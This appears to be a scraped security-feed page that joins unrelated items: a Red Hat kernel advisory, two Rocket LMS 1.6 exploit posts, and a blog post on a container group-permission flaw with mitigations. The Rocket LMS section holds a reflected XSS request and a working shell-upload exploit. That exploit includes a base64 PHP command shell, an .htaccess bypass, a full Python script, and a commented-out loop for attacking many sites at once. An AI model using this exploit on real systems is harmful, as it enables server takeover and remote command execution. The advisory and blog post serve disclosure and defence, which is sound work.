sWebkDhq5HJ9x4UKTkyT8RsI/q4BOFPflu4PwlGJEMQf1q7tMr0OZFKoD+Ku3JcH  
gnZufTP+0IE=  
=AKN0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6463-01

Red Hat Security Advisory 2022-6432-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:6432-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6432  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-1729   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6  
Advanced Update Support, Red Hat Enterprise Linux 7.6 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.6 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.6) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.6) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.6) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: race condition in perf_event_open leads to privilege escalation  
(CVE-2022-1729)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Posix ACL object is leaked in several places upon setattr and fsetxattr  
syscalls (BZ#2106587)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source:  
kernel-3.10.0-957.97.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.97.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.97.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.97.1.el7.x86_64.rpm  
perf-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.6):

Source:  
kernel-3.10.0-957.97.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.97.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.97.1.el7.noarch.rpm

ppc64le:  
kernel-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-957.97.1.el7.ppc64le.rpm  
perf-3.10.0-957.97.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
python-perf-3.10.0-957.97.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm

x86_64:  
kernel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.97.1.el7.x86_64.rpm  
perf-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.6):

Source:  
kernel-3.10.0-957.97.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.97.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.97.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.97.1.el7.x86_64.rpm  
perf-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.6):

ppc64le:  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-957.97.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.ppc64le.rpm

x86_64:  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.97.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.97.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1729  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCBxdzjgjWX9erEAQhKxA/9Hw1hyZk5zX6OsPzqT/n32YbvIfWh/RWC  
fCC7NzSsHPDZNyDnStFsU4TmbJOiJv33dW2vnUFNJeBBPfjMJLNi+qW8Ahbfb7oq  
njo8hr/JzaNHrWUlQwOC+Y5GMDdzfBb0Dj5eNVSze+3/jzoKEeeQs63I3F5wpKzg  
xNRPcnqWm32nN6xAE+6Tt7S73OZVkec+T9Qhl50jDIIYLe50wph1Hb5Ipg07u+k3  
h+OiwdZH+MHyMMNWAONnaik/7sr+5/sZINufl3SDdATs1PA5kCtcdseXRarKYhh6  
Uw+LZMNNdwX7m/zy1Aq+XI9sK+UZcTE0Er/YPB5huhoMqJjDq2IDiUDypYN6LALH  
5Q+lCK31zVt51qM4PGsic/t2yZPb3NbOhuVZwMLnTycdMtiEbvhc1TUbQW4f+8f5  
9f4ynSGsmN+okW8pTIc75MCP6p9fv7i/LknmBeKFpj78gBnJ+CyeH29n1mV0+qgI  
e+tfx7nO0zPbMw4n5FlQ3wiHWnayg2kk3Uc11wGH7E7D/f5BAyzrtEa7W0W6K3g/  
MZUidAcIqa3PIkrcbYqk+LEV83X0L9z12F8DSrJKQScY4Mi3pwXOebBquQ99GKAi  
pjq3CmNUJQSOFP7Mj9bOrKjeXJIOVbcKHRIk+EgcRPoOMBRgZiR6yvMzspj0Akd2  
utx/DwGeYqU=  
=mygj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6432-01

Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04-------Request-----------GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3DConnection: close

Rocket LMS 1.6 Cross Site Scripting

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

An incorrect handling of the supplementary groups in the Buildah container engine might lead to the sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.

Operating system access controls, that constrain which programs can open which files, have existed for almost as long as computers themselves. Access controls are still widely used and are more flexible and efficient when compared to cryptographically protecting files. Despite the long history, there continues to be innovation in access control, particularly now in containers, like Docker and Kubernetes and similar technologies offered by cloud providers. Here, rather than running lots of software on a single computer, the service is split up into microservices running in containers. Each container is isolated from others on the same computer as if it has its own computer and operating system and is prevented from reading files in other containers.

However, in reality, there’s only one operating system, and the container runtime’s role is to create the illusion that there are more than one. As part of its job, the runtime should also set up containers such that access control works inside each container because not every program running inside a container should be able to access every file. Multiple containers can also be given access to the same directory, and access controls used to restrict what each container can do with the directory contents. If access controls don’t work properly, an attacker could read or modify files they should not be able to.

Unfortunately, there is such a vulnerability. The bad news is that it originates from an omission in the specification that underlies all the major container runtimes and so is present regardless of which container runtime you use (e.g. runc, crun, Kata Containers) and regardless of whether you use containers directly (e.g. through Docker or podman) or indirectly (e.g. through Kubernetes). The good news is that the vulnerability affects a feature of Linux access control permissions that is not widely used – negative group permissions. However, if your system does depend on this feature then the vulnerability could be serious. Read on for more details about the vulnerability, why it exists and what can be done to mitigate the problem.

**Introduction to Linux permissions**

In Linux there are user accounts and each user is also a member of a group. Each object (files, directories, devices, etc.) has an associated owner and associated group. The object also has a set of permissions associated with the three classes: owner, group, and other. These permissions tell the operating system whether a user should be able to read from the object (r), write to the object (w) and execute the object (x). If a user is the owner of an object the owner-class permissions are used, if the user is a member of the file’s group, the group-class permissions are used, and otherwise the other-class permissions are used.

For example, a file containing a company’s finance database could be owned by the Chief Financial Officer (CFO) and have owner class permissions “r+w”. It could have the group set to “auditors” with group-class permissions only “r” and other-class permissions set to nothing. Then the CFO could freely read and write to the database, all members of the group auditors could read it, and everyone else cannot access the database at all.

This sort of configuration works but isn’t flexible. What happens if an auditor is also a member of the company sports team and that team use group-class permissions for controlling access to the database of upcoming fixtures? Would the auditor have to leave the auditors group and join the sports team group and so lose access to the accounts database? In fact, no, because not only does a user have a primary group, but they can have supplementary groups. When an access control decision is made, the operating system uses the group-class permissions if the group of an object matches any of the user’s groups. So a user could be a member of the auditor group and the sports team group. Not only can a user take on the rights of any of its supplementary groups, but it can also change the group of any file they own to any of their supplementary groups.

The final concept I need to introduce is set-group programs. Let’s suppose that we don’t want every user to be able to see the finance database, but we do want every user to be able to get a balance report for their department. We can create a program that checks which user started the program and get the balance report for that user. But that won’t work because programs inherit the rights of the user that runs them, and the user can’t read the database. So we make the program set-group “auditor”, and now when it runs, it will take on the rights of the auditor group and be able to read the finance database. (There’s similar functionality for set-user programs, but I won’t go into this here).

**Negative group permissions**

In the above example, the user-class permissions (r+w) were greater than the group-class (r), which were, in turn, greater than the other-class (nothing). This is the way things usually are, with the more specific class having at least as many rights as less specific classes. However, it doesn’t need to be that way. If an object is set as, for example, user: r, group: nothing and other: r, then everyone can read this file except members of the object’s group. This is an intentional feature of Linux permissions and does get used, albeit not very frequently. Where it might be useful is for building up a deny-list for a sensitive object so that certain untrustworthy programs cannot access it.

To support such scenarios, users should not be able to drop a group because they could then bypass access control enforced through negative group permissions. But could set-group executables be used to do so? A user could create a program, change its group to one of the user’s supplementary groups, and then run this program. When the program runs, its group will be the supplementary group and not the user’s primary group. Would that allow the user to drop the primary group and get access to an object its group would not allow?

Fortunately, it does not, because when the user logs in, their primary group is duplicated and added to the list of supplementary groups. When the set-group program runs, its group is indeed the supplementary group chosen, but the list of supplementary groups still includes the original primary group. So the operating system will still reject the access request because the group that is denied access is in the supplementary group list. However, if the code is running in a container, the situation is different.

**Primary group is not duplicated in containers**

The behaviour of duplicating a user’s primary group at login was introduced in the 4.4 BSD operating system released in 1994, and Linux takes a similar approach. However, Docker containers did not follow and while the primary group is set, this group is not duplicated in the list of supplementary groups. The Open Container Initiative created an interoperable standard for containers which does not explicitly say what containers should do here. Still, all the implementations I am aware of followed the example of Docker. Consequently, a program running in a container could drop its primary group. If negative group permissions are in use, the program would be able to violate the system’s access control policy.

**Exploiting the vulnerability**

If an attacker can run code in the container, they can create a set-group program with the group set to one of the supplementary groups. When this program runs, its group will be the supplementary group, and the list of supplementary groups will be that user’s supplementary groups. However, the user’s primary group will have been dropped. If the program accesses a file that has negative group permissions for the user’s primary group, it will be able to access the file in a way that the user was not supposed to, and so violate the intended permissions.

A demonstration of this vulnerability can be found in the video below, which uses the proof-of-concept code I’ve made available on Github. The container images I created are on Docker Hub, for both x86\_64 and aarch64.

**Mitigating the problem**

I reported this vulnerability to Docker on 27 May 2022, but investigation of this vulnerability was passed onto the Moby project, since it affects multiple implementations of Linux containers and not just Docker. Developers of affected software have been working on patches that would fix the vulnerability and address the omission in the specification. Since the vulnerability only affects an access control feature that is not commonly used, the severity of the vulnerability has been assessed to be low and so the vulnerability can be discussed publicly while the mitigation work is underway.

Common Vulnerabilities and Exposures (CVE) IDs have been allocated to track this vulnerability as it relates to affected software packages. Why are there multiple CVE IDs? The Open Container Initiative Runtime Specification does not require the vulnerable behaviour but just is sufficiently ambiguous as to permit it. Even though, currently, all implementations of this specification are vulnerable, the CVE IDs are still associated with the vulnerable software rather than the specification. I hope the specification will also be revised to explicitly require that implementations enforce the correct behaviour. The CVE IDs allocated so far are:

*   CVE-2022-2989: podman
*   CVE-2022-2990: buildah
*   CVE-2022-2995: cri-o
*   CVE-2022-36109: Moby (Docker Engine)

In the meantime, there are however some steps that can be taken to work around the vulnerability.

**Initialising containers with “su”**

The vulnerability exists because the container runtime does not set up groups properly when these are specified in the container configuration (i.e. the USER Dockerfile instruction and the runAsUser/runAsGroup Kubernetes setting). An alternative is to start the container as root, and then use the “su” command with the “-l” flag to set the user. This approach will set up groups properly and so avoid the problem.

**Duplicating groups manually**

The container runtime uses the contents of /etc/passwd and /etc/group to set up the primary group and supplementary groups, respectively. If you modify /etc/group to add the user to their primary group a second time, the container runtime will set up the groups properly. This approach is a bit of a hack but it seems to work.

For example, here the user’s primary group is specified both in /etc/passwd (with the numeric group ID 1000) and in /etc/group where the user is also listed as a member.

**/etc/passwd:**  
user:x:1000:1000:Linux User,,,:/home/user:/bin/ash

**/etc/group:**  
user:x:1000:user

**Blocking setuid/setgid programs**

Exploiting the vulnerability depends on having a set-group program to change the available privileges. If you don’t need setgid or setuid programs you can disable this functionality through the Docker “--security-opt no-new-privileges” flag or the Kubernetes “allowPrivilegeEscalation=false” setting.

**Identifying the use of negative group permissions**

It is difficult to know whether software relies on negative group permissions because this is an implementation detail which is not often explicitly documented. To serve as a starting point for investigation, I’ve written a program that searches for files and directories that have negative group permissions. It is not perfect – it won’t identify cases where negative group permissions are set for temporary files. It also won’t find cases where negative group permissions are implemented in configuration files (e.g. for sudo) rather than on the file system. There can also be false positives. On my systems, I did find many files that have negative group permissions, apparently by accident.

**Lessons for system design**

This vulnerability should, of course, be fixed, but there are also some broader lessons that can be drawn. Including a user’s primary group within the supplementary groups isn’t written down as a requirement – it is undefined. What “undefined” means is that applications shouldn’t rely on a particular behaviour, but that doesn’t mean all choices are equally correct. Interoperability standards have this problem: they specify the minimum to allow maximum flexibility, but that isn’t what you want for security. The EMV card payment interoperability standard suffers from the same weakness. There is a separate role for a standard that requires certain behaviour for security or other reasons.

There are also lessons for software rewrites. There’s a movement to rewrite C software in memory-safe languages, with Rust now a popular choice. Doing so can indeed bring substantial security benefits, but any rewrite also risks missing essential features, particularly when they are documented nowhere but in legacy code. Docker effectively rewrote the group initialisation code in Go and avoided many of the potential flaws in the original C code but created a new vulnerability by not implementing the login sequence in the same way as Linux. That is not to say that rewriting is always a bad idea, but just that doing so introduces new risks that should be mitigated.

**Update 2022-08-21:** Add Common Vulnerabilities and Exposures (CVE) references to vulnerabilities in affected products: CVE-2022-2989 (podman), CVE-2022-2990 (buildah), and CVE-2022-2995 (cri-o).

**Update 2022-09-09:** Add CVE reference to vulnerability in Moby (Docker Engine): CVE-2022-36109.

